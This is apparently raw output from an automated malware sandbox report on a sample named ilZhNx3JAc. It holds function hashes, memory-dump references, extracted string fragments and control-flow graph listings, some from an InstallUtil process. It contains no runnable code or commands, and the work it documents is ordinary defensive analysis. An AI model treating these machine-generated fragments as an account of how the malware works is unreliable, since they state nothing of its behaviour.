                                                                                                              • Snapshot File: hcaresult_7_2_8b70000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 28024be909675efca0e3965af331b4355978c9955d2051791ff5d6e9d9892c85
                                                                                                              • Instruction ID: 77aa813a5f4c9fdc443d5cdeb4b62e1ea304d33c648c10ac2ecb6db88f17f0f3
                                                                                                              • Opcode Fuzzy Hash: 28024be909675efca0e3965af331b4355978c9955d2051791ff5d6e9d9892c85
                                                                                                              • Instruction Fuzzy Hash: 6A417F71E05B588FEB59CF6B8C4058AFFF3AFC5201F19C1BAC458AA265DB7405868F11
                                                                                                              Function 08AA8830 Relevance: .1, Instructions: 97COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4c90564a64fd8432fa468ae27ea22cbb3895338caa861459852986aea9d4ae03
                                                                                                              • Instruction ID: a31b1059f8204aa00346bc1bb0c251e3a1f809eeffd1f35c24ecd3f17dc18938
                                                                                                              • Opcode Fuzzy Hash: 4c90564a64fd8432fa468ae27ea22cbb3895338caa861459852986aea9d4ae03
                                                                                                              • Instruction Fuzzy Hash: 6541EEB5C052589FCB10CFA9D484AEEFBF4BF09310F24906AE455B7250C778AA85CF64
                                                                                                              Function 08B70040 Relevance: .1, Instructions: 97COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1406385202.0000000008B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8b70000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2790ce751399cf9991e288d161e800c835610b9289304407e126794bd6a324fc
                                                                                                              • Instruction ID: 339f2060da957fad54ca4b1d266bdfae78b73ccd2bb7f5d2997407d0db207cf0
                                                                                                              • Opcode Fuzzy Hash: 2790ce751399cf9991e288d161e800c835610b9289304407e126794bd6a324fc
                                                                                                              • Instruction Fuzzy Hash: 44412B71E05B188FEB58CF6B9C4469AFAF3AFC9301F14C1BAD41CAA265DB7045868F01
                                                                                                              Function 08AA8838 Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cbf00fca1857489dcb2781e91311c829dd44f8d28a9d2a77d167839d6648226d
                                                                                                              • Instruction ID: db4dba3315ab79f7d6c495ac1bef0940c20444614a4e954b7acd551bf518eb19
                                                                                                              • Opcode Fuzzy Hash: cbf00fca1857489dcb2781e91311c829dd44f8d28a9d2a77d167839d6648226d
                                                                                                              • Instruction Fuzzy Hash: 6141DDB5D052589FCB10CFA9D484AEEFBF4BF09320F14946AE455B7240C778AA45CF64
                                                                                                              Function 08AA9D78 Relevance: .1, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 19e447f3f5c6111af9af95010245caf5ab1fb680af166edecd309d635f5c0f01
                                                                                                              • Instruction ID: 9cd37d78e1b5fbea4e65c5becbbe7b7f82cefb15947a28479bf121265ab2ae6b
                                                                                                              • Opcode Fuzzy Hash: 19e447f3f5c6111af9af95010245caf5ab1fb680af166edecd309d635f5c0f01
                                                                                                              • Instruction Fuzzy Hash: 59314874E04248CFDB64CFA8D8457AEBBF1FB89305F5080AAD90AA7685DB306D85CF45
                                                                                                              Function 08A9F520 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb485824530f42234332bb226817e07b2376f7339a69fc8fb4c2320d36678ac8
                                                                                                              • Instruction ID: 27c831f7bfece05722bc5c13498280c9e11ec855c34281033a7dcc4601a807d5
                                                                                                              • Opcode Fuzzy Hash: fb485824530f42234332bb226817e07b2376f7339a69fc8fb4c2320d36678ac8
                                                                                                              • Instruction Fuzzy Hash: F13138B1E08218DFEF18CF9AD84479EBBF6BB89301F04D16AD449AB254DB745945CF10
                                                                                                              Function 08AB5400 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405919522.0000000008AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8ab0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9b427c5a8f1c7c5064ebf07d0557fa8ca4eab302618162d1dc636fbbf141fde3
                                                                                                              • Instruction ID: 7a50c04b004268977346a85165c0fc2bc96ec754ef0ea2b02512ab30605a20d0
                                                                                                              • Opcode Fuzzy Hash: 9b427c5a8f1c7c5064ebf07d0557fa8ca4eab302618162d1dc636fbbf141fde3
                                                                                                              • Instruction Fuzzy Hash: C331C6B1E056188BDB58CF6BC9406D9FBF7BFC9311F14C1AAC508AB215DB705A858E40
                                                                                                              Function 08AA3B98 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ab24af7aba921929f60e020af3d8ec629ca29cf9d3d0f0377ec8ec57313621e0
                                                                                                              • Instruction ID: 1d198d6a7c40e1c5cb594c11599978564cafc902945b935d12ce191b1dc35cbe
                                                                                                              • Opcode Fuzzy Hash: ab24af7aba921929f60e020af3d8ec629ca29cf9d3d0f0377ec8ec57313621e0
                                                                                                              • Instruction Fuzzy Hash: 39210FB5C052489FCB10DFA9D880AEEFBF0BB49320F14906AE814B7350CB356905CFA5
                                                                                                              Function 08AA3BA0 Relevance: .1, Instructions: 66COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405839112.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8aa0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fad134cd717b665a79ed991e3157f64f79f5bf9577808b4c790dbac73733b7f2
                                                                                                              • Instruction ID: 8cb1caeaef66248a5a40c6e485b160ce58bbd6b2099dedacf64c2d2e9fefd297
                                                                                                              • Opcode Fuzzy Hash: fad134cd717b665a79ed991e3157f64f79f5bf9577808b4c790dbac73733b7f2
                                                                                                              • Instruction Fuzzy Hash: 1E21EDB5D012089FCB14DFA9D980AEEFBF4BB49320F14902AE814B7340CB356905CFA4
                                                                                                              Function 08AB53EF Relevance: .1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405919522.0000000008AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8ab0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 42c7916985324f3304f956f02a90666003ca0e6b436f7bdfccd7469a46a35eaa
                                                                                                              • Instruction ID: f6859fc1fadf71bc217b4888fb15049f9466f783fe066ea1184c3e7b4dc7aa41
                                                                                                              • Opcode Fuzzy Hash: 42c7916985324f3304f956f02a90666003ca0e6b436f7bdfccd7469a46a35eaa
                                                                                                              • Instruction Fuzzy Hash: 7921BB71E056588BEB1CCFAB99402DDFBF7BFC9311F04C1BAC548AA255DB700A968E44
                                                                                                              Function 08ABE128 Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405919522.0000000008AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8ab0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$4'q$4'q$4'q$4'q$pq
                                                                                                              • API String ID: 0-2944075406
                                                                                                              • Opcode ID: 9455f65a0c0af019d5c9bfb7c36ec0726d7731a53aa36ef459097f517a4b0385
                                                                                                              • Instruction ID: e8640ffac4707320f3fc277a3a900fe321fb5c1ec2ce6e08e474d14b926ddd9d
                                                                                                              • Opcode Fuzzy Hash: 9455f65a0c0af019d5c9bfb7c36ec0726d7731a53aa36ef459097f517a4b0385
                                                                                                              • Instruction Fuzzy Hash: 19519430E003048FEB58DBA9D4507AEBBE6AFC8205F24892CC44A9B255DF35AD06C7E1
                                                                                                              Function 06EF0688 Relevance: 6.4, Strings: 5, Instructions: 176COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1389862344.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_6ef0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$$q$$q$$q
                                                                                                              • API String ID: 0-170447905
                                                                                                              • Opcode ID: 3684879d588ada797f5721a2a9e90596a2aad2fdf241af6e247e3fbc27fdafa9
                                                                                                              • Instruction ID: f44c81709c484d7b50172d0ac813e04d1d453736150cf32dead3353cd3e72ed7
                                                                                                              • Opcode Fuzzy Hash: 3684879d588ada797f5721a2a9e90596a2aad2fdf241af6e247e3fbc27fdafa9
                                                                                                              • Instruction Fuzzy Hash: CD513B31F24345DFEB755B2598347AA7BA2AF84214F1480A6DA05CB2D3EB31CD45CBE2
                                                                                                              Function 06EF12BC Relevance: 6.4, Strings: 5, Instructions: 136COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1389862344.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_6ef0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$Teq$Teq$Teq
                                                                                                              • API String ID: 0-767899262
                                                                                                              • Opcode ID: 5c00841e6ff864a12e8ef6d418463272e47e91d6e4b63ff68c6f4e810b6ce5e3
                                                                                                              • Instruction ID: 370244cabf46e1b2dacf6ad871abb1ad41dbd1d0f96b34f1a01ae4e28307d15d
                                                                                                              • Opcode Fuzzy Hash: 5c00841e6ff864a12e8ef6d418463272e47e91d6e4b63ff68c6f4e810b6ce5e3
                                                                                                              • Instruction Fuzzy Hash: 6D414B30F2130DDFEB648B7994547FABBA69FC8208B14907AD605CB241EF35D802C7A2
                                                                                                              Function 08ABD9C0 Relevance: 5.4, Strings: 4, Instructions: 386COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405919522.0000000008AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8ab0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$(q$Hq$Hq
                                                                                                              • API String ID: 0-1379979155
                                                                                                              • Opcode ID: 79a367330f77d593c412e5b43e91c99704f3e7c3191a21e8fd53b7c7b37fc75a
                                                                                                              • Instruction ID: 60d90a2df61ca258422948b1d262c512b38ce21f1438b3e13569465d5d0e9c08
                                                                                                              • Opcode Fuzzy Hash: 79a367330f77d593c412e5b43e91c99704f3e7c3191a21e8fd53b7c7b37fc75a
                                                                                                              • Instruction Fuzzy Hash: EBE1CF30A002158FDB04DF39C490BAE7BA6BF84315F15866CE849DB7A6DB34EC46CB95
                                                                                                              Function 08A955B8 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (_q$(_q$(_q$(_q
                                                                                                              • API String ID: 0-1088526261
                                                                                                              • Opcode ID: 852d4a8fdf10499f4925086da00577286a99da74a642b6e97eacd1794e93863d
                                                                                                              • Instruction ID: 6368a20866443c7ff16669ae161f4ec4e542ac7a9ea0f15498a87d5c7ec270c1
                                                                                                              • Opcode Fuzzy Hash: 852d4a8fdf10499f4925086da00577286a99da74a642b6e97eacd1794e93863d
                                                                                                              • Instruction Fuzzy Hash: 8561E170F042048FDB05DB78D4656AEBBF6EF86301B14446DE946AB361EB31DC82CB91
                                                                                                              Function 06EF0308 Relevance: 5.1, Strings: 4, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1389862344.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_6ef0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$$q$$q
                                                                                                              • API String ID: 0-3199993180
                                                                                                              • Opcode ID: 69e46c4dca96d6752328b5d15ca2f162d3ea504adbe7ed3dee80938bf8f37637
                                                                                                              • Instruction ID: 6c434eb3efc867095a7829454c03840b2adbd3866da954f7a106530549d92140
                                                                                                              • Opcode Fuzzy Hash: 69e46c4dca96d6752328b5d15ca2f162d3ea504adbe7ed3dee80938bf8f37637
                                                                                                              • Instruction Fuzzy Hash: FB01BC11A2A3864FE72B12652838AA66FB69BC254431E41E7E542CB293CC144D0683B7

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:9.5%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:14
                                                                                                              Total number of Limit Nodes:1
                                                                                                              execution_graph 28060 65b2e38 28061 65b2e60 28060->28061 28064 65b2e8c 28060->28064 28062 65b2e69 28061->28062 28065 65b22d4 28061->28065 28066 65b22df 28065->28066 28067 65b3183 28066->28067 28069 65b22f0 28066->28069 28067->28064 28070 65b31b8 OleInitialize 28069->28070 28071 65b321c 28070->28071 28071->28067 28072 65b0c70 28073 65b0cb2 28072->28073 28075 65b0cb9 28072->28075 28074 65b0d0a CallWindowProcW 28073->28074 28073->28075 28074->28075

                                                                                                              Executed Functions

                                                                                                              Function 05FDADC8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 5fdadc8-5fdadef 1 5fdadf1-5fdadf4 0->1 2 5fdae0c-5fdae0f 1->2 3 5fdadf6-5fdadfc 1->3 4 5fdae35-5fdae38 2->4 5 5fdae11-5fdae30 2->5 6 5fdae07 3->6 7 5fdb47c-5fdb47e 4->7 8 5fdae3e-5fdae5e 4->8 5->4 6->2 10 5fdb485-5fdb488 7->10 11 5fdb480 7->11 15 5fdae6b-5fdae8b 8->15 16 5fdae60-5fdae66 8->16 10->1 13 5fdb48e-5fdb497 10->13 11->10 18 5fdb46e-5fdb47b 15->18 19 5fdae91-5fdae9d 15->19 16->13 20 5fdb464-5fdb469 19->20 21 5fdaea3-5fdaecd 19->21 20->18 24 5fdaecf-5fdaee2 21->24 25 5fdaee7-5fdaefa 21->25 26 5fdb41a-5fdb421 24->26 30 5fdaefc-5fdaf02 25->30 31 5fdaf12-5fdaf2b 25->31 27 5fdb42f 26->27 28 5fdb423 26->28 27->20 28->27 32 5fdaf04 30->32 33 5fdaf06-5fdaf08 30->33 35 5fdaf2d-5fdaf33 31->35 36 5fdaf43-5fdaf60 31->36 32->31 33->31 37 5fdaf35 35->37 38 5fdaf37-5fdaf39 35->38 40 5fdaf79-5fdaf83 36->40 41 5fdaf62-5fdaf65 36->41 37->36 38->36 45 5fdaf89-5fdafa4 40->45 41->40 42 5fdaf67-5fdaf77 41->42 42->45 47 5fdafbe-5fdafcd 45->47 48 5fdafa6-5fdafb9 45->48 49 5fdb405-5fdb418 47->49 50 5fdafd3-5fdb06a 47->50 48->26 49->26 59 5fdb070-5fdb092 50->59 60 5fdb3f3-5fdb3ff 50->60 59->60 62 5fdb098-5fdb0a2 59->62 60->49 60->50 62->60 63 5fdb0a8-5fdb0b3 62->63 63->60 64 5fdb0b9-5fdb18f 63->64 76 5fdb19d-5fdb1cd 64->76 77 5fdb191-5fdb193 64->77 81 5fdb1cf-5fdb1d1 76->81 82 5fdb1db-5fdb1e5 76->82 77->76 81->82 83 5fdb245-5fdb249 82->83 84 5fdb1e7-5fdb1eb 82->84 85 5fdb24f-5fdb28b 83->85 86 5fdb3e4-5fdb3ed 83->86 84->83 87 5fdb1ed-5fdb217 84->87 97 5fdb28d-5fdb28f 85->97 98 5fdb299-5fdb2a6 85->98 86->60 86->64 94 5fdb219-5fdb21b 87->94 95 5fdb225-5fdb242 87->95 94->95 95->83 97->98 98->86 101 5fdb2ac-5fdb2b7 98->101 103 5fdb2cf-5fdb2fb 101->103 104 5fdb2b9-5fdb2bf 101->104 103->86 111 5fdb301-5fdb317 103->111 105 5fdb2c1 104->105 106 5fdb2c3-5fdb2c5 104->106 105->103 106->103 111->86 113 5fdb31d-5fdb345 111->113 113->86 118 5fdb34b-5fdb356 113->118 120 5fdb36e-5fdb374 118->120 121 5fdb358-5fdb35e 118->121 124 5fdb378-5fdb384 120->124 125 5fdb376 120->125 122 5fdb360 121->122 123 5fdb362-5fdb364 121->123 122->120 123->120 126 5fdb386-5fdb3dd call 5fd98c0 124->126 125->126 126->86
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5fd0000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                                                                              • API String ID: 0-1298971921
                                                                                                              • Opcode ID: 682edbc962fe94334f575be0f8f594a7b1ef7c3def9ba0b362f81eb0eb674500
                                                                                                              • Instruction ID: 1d690a3f7ca2e317ff5d67db3c0325d4b01258922211d63d11ba57e8a647ed4a
                                                                                                              • Opcode Fuzzy Hash: 682edbc962fe94334f575be0f8f594a7b1ef7c3def9ba0b362f81eb0eb674500
                                                                                                              • Instruction Fuzzy Hash: 8E121831E002198FDB24DF65D894BAEF7B3BF88301F2585A9D40AAB254DB359D85CF90
                                                                                                              Function 05FD6780 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 260 5fd6780-5fd67a1 261 5fd67a3-5fd67a6 260->261 262 5fd67cc-5fd67cf 261->262 263 5fd67a8-5fd67c7 261->263 264 5fd67d5-5fd67f4 262->264 265 5fd6f70-5fd6f72 262->265 263->262 273 5fd680d-5fd6817 264->273 274 5fd67f6-5fd67f9 264->274 267 5fd6f79-5fd6f7c 265->267 268 5fd6f74 265->268 267->261 269 5fd6f82-5fd6f8b 267->269 268->267 278 5fd681d-5fd682c 273->278 274->273 275 5fd67fb-5fd680b 274->275 275->278 386 5fd682e call 5fd6f98 278->386 387 5fd682e call 5fd6fa0 278->387 279 5fd6833-5fd6838 280 5fd683a-5fd6840 279->280 281 5fd6845-5fd6b22 279->281 280->269 302 5fd6b28-5fd6bd7 281->302 303 5fd6f62-5fd6f6f 281->303 312 5fd6bd9-5fd6bfe 302->312 313 5fd6c00 302->313 315 5fd6c09-5fd6c1c 312->315 313->315 317 5fd6f49-5fd6f55 315->317 318 5fd6c22-5fd6c44 315->318 317->302 319 5fd6f5b 317->319 318->317 321 5fd6c4a-5fd6c54 318->321 319->303 321->317 322 5fd6c5a-5fd6c65 321->322 322->317 323 5fd6c6b-5fd6d41 322->323 335 5fd6d4f-5fd6d7f 323->335 336 5fd6d43-5fd6d45 323->336 340 5fd6d8d-5fd6d99 335->340 341 5fd6d81-5fd6d83 335->341 336->335 342 5fd6df9-5fd6dfd 340->342 343 5fd6d9b-5fd6d9f 340->343 341->340 344 5fd6f3a-5fd6f43 342->344 345 5fd6e03-5fd6e3f 342->345 343->342 346 5fd6da1-5fd6dcb 343->346 344->317 344->323 357 5fd6e4d-5fd6e5b 345->357 358 5fd6e41-5fd6e43 345->358 353 5fd6dcd-5fd6dcf 346->353 354 5fd6dd9-5fd6df6 346->354 353->354 354->342 360 5fd6e5d-5fd6e68 357->360 361 5fd6e72-5fd6e7d 357->361 358->357 360->361 364 5fd6e6a 360->364 365 5fd6e7f-5fd6e85 361->365 366 5fd6e95-5fd6ea6 361->366 364->361 367 5fd6e89-5fd6e8b 365->367 368 5fd6e87 365->368 370 5fd6ebe-5fd6eca 366->370 371 5fd6ea8-5fd6eae 366->371 367->366 368->366 375 5fd6ecc-5fd6ed2 370->375 376 5fd6ee2-5fd6f33 370->376 372 5fd6eb0 371->372 373 5fd6eb2-5fd6eb4 371->373 372->370 373->370 377 5fd6ed4 375->377 378 5fd6ed6-5fd6ed8 375->378 376->344 377->376 378->376 386->279 387->279
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5fd0000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q$$q$$q
                                                                                                              • API String ID: 0-2069967915
                                                                                                              • Opcode ID: 91242525fafdc2e152fb3d9fd15839cedd28c7fef037e519c37f92c44bdd9d14
                                                                                                              • Instruction ID: 28cab8599b9a3cdbe47a4abe9993fd0c5aa2330be3b2cbf15f2eba7b26f8b0cd
                                                                                                              • Opcode Fuzzy Hash: 91242525fafdc2e152fb3d9fd15839cedd28c7fef037e519c37f92c44bdd9d14
                                                                                                              • Instruction Fuzzy Hash: 6A321E31E107198FCB14EF69D85469DF7B2FFC9300F24D6AAD409AB254EB30A985CB90
                                                                                                              Function 05FDB4A8 Relevance: 3.0, Strings: 2, Instructions: 473COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 500 5fdb4a8-5fdb4c6 501 5fdb4c8-5fdb4cb 500->501 502 5fdb4cd-5fdb4e7 501->502 503 5fdb4ec-5fdb4ef 501->503 502->503 504 5fdb506-5fdb509 503->504 505 5fdb4f1-5fdb4ff 503->505 507 5fdb52c-5fdb52f 504->507 508 5fdb50b-5fdb527 504->508 515 5fdb54e-5fdb564 505->515 516 5fdb501 505->516 509 5fdb53c-5fdb53e 507->509 510 5fdb531-5fdb53b 507->510 508->507 512 5fdb545-5fdb548 509->512 513 5fdb540 509->513 512->501 512->515 513->512 520 5fdb77f-5fdb789 515->520 521 5fdb56a-5fdb573 515->521 516->504 522 5fdb579-5fdb596 521->522 523 5fdb78a-5fdb794 521->523 529 5fdb76c-5fdb779 522->529 530 5fdb59c-5fdb5c4 522->530 526 5fdb795 523->526 526->526 527 5fdb797-5fdb7bf 526->527 531 5fdb7c1-5fdb7c4 527->531 529->520 529->521 530->529 546 5fdb5ca-5fdb5d3 530->546 532 5fdb7e7-5fdb7ea 531->532 533 5fdb7c6-5fdb7e2 531->533 535 5fdb897-5fdb89a 532->535 536 5fdb7f0-5fdb7fc 532->536 533->532 537 5fdbacf-5fdbad1 535->537 538 5fdb8a0-5fdb8af 535->538 543 5fdb807-5fdb809 536->543 540 5fdbad8-5fdbadb 537->540 541 5fdbad3 537->541 552 5fdb8ce-5fdb912 538->552 553 5fdb8b1-5fdb8cc 538->553 540->531 545 5fdbae1-5fdbaea 540->545 541->540 548 5fdb80b-5fdb811 543->548 549 5fdb821-5fdb825 543->549 546->523 554 5fdb5d9-5fdb5f5 546->554 555 5fdb815-5fdb817 548->555 556 5fdb813 548->556 550 5fdb827-5fdb831 549->550 551 5fdb833 549->551 557 5fdb838-5fdb83a 550->557 551->557 565 5fdb918-5fdb929 552->565 566 5fdbaa3-5fdbab8 552->566 553->552 563 5fdb5fb-5fdb625 554->563 564 5fdb75a-5fdb766 554->564 555->549 556->549 558 5fdb83c-5fdb83f 557->558 559 5fdb851-5fdb88a 557->559 558->545 559->538 584 5fdb88c-5fdb896 559->584 580 5fdb62b-5fdb653 563->580 581 5fdb750-5fdb755 563->581 564->529 564->546 572 5fdb92f-5fdb94c 565->572 573 5fdba8e-5fdba9d 565->573 566->537 572->573 585 5fdb952-5fdba48 call 5fd98c0 572->585 573->565 573->566 580->581 590 5fdb659-5fdb687 580->590 581->564 634 5fdba4a-5fdba54 585->634 635 5fdba56 585->635 590->581 596 5fdb68d-5fdb696 590->596 596->581 597 5fdb69c-5fdb6ce 596->597 605 5fdb6d9-5fdb6f5 597->605 606 5fdb6d0-5fdb6d4 597->606 605->564 608 5fdb6f7-5fdb74e call 5fd98c0 605->608 606->581 607 5fdb6d6 606->607 607->605 608->564 636 5fdba5b-5fdba5d 634->636 635->636 636->573 637 5fdba5f-5fdba64 636->637 638 5fdba66-5fdba70 637->638 639 5fdba72 637->639 640 5fdba77-5fdba79 638->640 639->640 640->573 641 5fdba7b-5fdba87 640->641 641->573
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5fd0000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q
                                                                                                              • API String ID: 0-3126353813
                                                                                                              • Opcode ID: 1ef3a346bdd0ee1051b3577648d1c374fd7446c0d8cd4b8e8e2b1406259d7aad
                                                                                                              • Instruction ID: 7996a3722a25e52034e5f85130bfbdbb7240a981db2b68d0c9225455ba025f69
                                                                                                              • Opcode Fuzzy Hash: 1ef3a346bdd0ee1051b3577648d1c374fd7446c0d8cd4b8e8e2b1406259d7aad
                                                                                                              • Instruction Fuzzy Hash: FD027D34B002149FDB14DF68D454B6EBBA3FF84314F198529D8099B399DB39ED46CBA0
                                                                                                              Function 05FD0040 Relevance: 2.8, Instructions: 2750COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
